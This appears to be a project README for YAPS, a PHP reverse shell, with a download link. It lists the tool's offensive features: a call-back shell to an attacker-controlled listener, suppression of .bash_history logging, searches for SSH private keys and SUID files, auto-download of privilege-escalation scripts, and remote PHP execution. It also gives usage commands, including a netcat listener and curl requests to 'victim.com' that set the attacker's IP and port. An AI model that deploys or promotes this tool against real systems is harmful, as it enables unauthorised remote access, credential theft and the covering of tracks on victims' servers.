As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (nc -lp 1337
).
In the current version (1.0), its main functions support only linux systems, but i’m planning to make it work with Windows too.
It’s currently in its first version and I haven’t tested it much yet, and there are still many things I intend to do and improve for the next versions (it’s not done yet!), so please let me know if you’ve found any bugs. =)
Features
- Single PHP file (no need to install packages, libs, or download tons of files)
- Works with netcat, ncat, socat, multi/handler, almost any listener
- Customizable password protection
- No logs in .bash_history
- Can do some enumeration
- Network info (interfaces, iptables rules, active ports)
- User info
- List SUID and GUID files
- Search for SSH keys (public and private)
- List crontab
- List writable PHP files
- Auto download LinPEAS, LinEnum or Linux Exploit Suggester
- Write and run PHP code on remote host
- (Semi) Stabilize shell
Cons
- Connection isn’t encrypted (nc does not support SSL)
- Not interactive (although you can spawn an interactive shell with
!stabilize
)- CTRL+C breaks it; can’t use arrows to navigate (unless you use
rlwrap
)
- CTRL+C breaks it; can’t use arrows to navigate (unless you use
Usage
- Set up a TCP listener;
- Set your IP and port. This can be done by:
- 2.1 Editing the variables at the start of the script;
- 2.2 Setting them via web request (
curl -x POST -d "x=ip&y=port" victim.com/yaps.php
orcurl victim.com/yaps.php?x=ip&y=port
);
- Open yaps.php on browser or curl it;
- Hack!
Working commands
!help - Display the help menu
!color - Toggle PS1 color (locally only, no environment variable is changed)
!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
!info - list informations about the target (the enumeration I mentioned above)
!stabilize - Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)
!passwd - Password option (enable, disable, set, modify)
!php - Write and run PHP on the remote host
!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use
Screenshots
Download: https://github.com/Nickguitar/YAPS
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